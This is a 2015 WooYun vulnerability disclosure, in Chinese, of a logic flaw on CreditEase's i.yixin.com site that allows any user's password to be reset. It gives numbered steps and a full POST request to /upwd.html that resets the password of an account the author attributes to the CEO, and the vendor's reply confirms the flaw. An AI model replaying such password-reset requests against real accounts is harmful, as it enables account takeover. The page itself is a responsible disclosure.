当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106754

漏洞标题:宜信在线官网任意用户密码重置/CEO账号演示<新思路>

相关厂商:宜信

漏洞作者: BMa

提交时间:2015-04-09 12:06

修复时间:2015-05-24 16:22

公开时间:2015-05-24 16:22

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开

简要描述:

宜信在线官网任意用户密码重置/CEO账号演示<新思路>
为什么是CEO账号呢?因为这个帐号是tangning@creditease.cn,莫非贵公司还有人与CEO抢公司邮箱账号?
20rank - - ! 惭愧

详细说明:

站点:http://i.yixin.com/
为什么说是新思路呢?在测试时发现每个账号与当前浏览器session绑定,也就是当前session只能重置一个账号密码,进一步发现该session在浏览器第一次打开时已经生成<而不是打开重置密码链接刷新的>,表现在客户端的就是cookie里的PHPSESSID
所以具体步骤如下:<步骤截图在第7步>
1、关闭浏览器
2、重新打开浏览器,访问http://i.yixin.com/,来到重置密码的地方,输入邮箱账号,点击下一步
3、这个过程中抓包,获取PHPSESSID,当然还有邮箱账号
4、将上面的PHPSESSID以及邮箱账号替换到下面的数据包中

POST /upwd.html HTTP/1.1
Host: i.yixin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://i.yixin.com/forget/d35279mMPiNNQemHNSbODYL7IS25UYCNRrnPs9FT05fu47Q7Fpg5eO2sl6-Kwy5g4Ilyc6_jEuwAfGvrFdnry4cNC2G9
Content-Length: 69
Cookie: PHPSESSID=sddmrf2fl52vio9ug477qcndn7;
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
reg_name=tangning%40creditease.cn&reg_pwd=1qaz2wsx&reg_repwd=1qaz2wsx


5、返回1,搞定

0.jpg


6、接下来自然是登录账号了,CEO

1.jpg


7、再来一个,也是贵公司的员工
<详细过程在图中>

1.1.jpg


1.2.jpg


1.3.jpg


漏洞证明:

修复方案:

版权声明:转载请注明来源 BMa@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-09 16:20

厂商回复:

感谢您对宜信安全的关注与支持。
之前使用SessionID的认证方式过于简单,感谢白帽子对漏洞的深入挖掘

最新状态:

暂无

漏洞评价:

评论

  1. 2015-04-09 12:08 | 大王叫我去巡山 ( 路人 | Rank:7 漏洞数:3 | 大王叫我去巡山)

    是因为CEO 有钱吗

  2. 2015-04-09 12:08 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    我怀疑前几次没修好

  3. 2015-04-09 12:56 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    mark

  4. 2015-04-09 12:56 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    看看新思路~

  5. 2015-05-24 20:57 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    PHPSESSID应该怎么改呢?

  6. 2015-05-25 08:37 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    截断返回包?

  7. 2015-05-25 10:06 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    感觉这个漏洞蛮有意思的

  8. 2015-05-25 13:42 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    @Me_Fortune 使用的是初始化时的phpsession

  9. 2015-05-29 18:01 | Jumbo ( 普通白帽子 | Rank:111 漏洞数:29 | 猫 - http://www.chinabaiker.com)

    ID是初次尝试登录用户时的ID,初次打开浏览器,输入用户名,PHPsession就与当前用户绑定,直到重置密码时,(笔记)

  10. 2015-09-10 16:30 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    这是什么鬼,不懂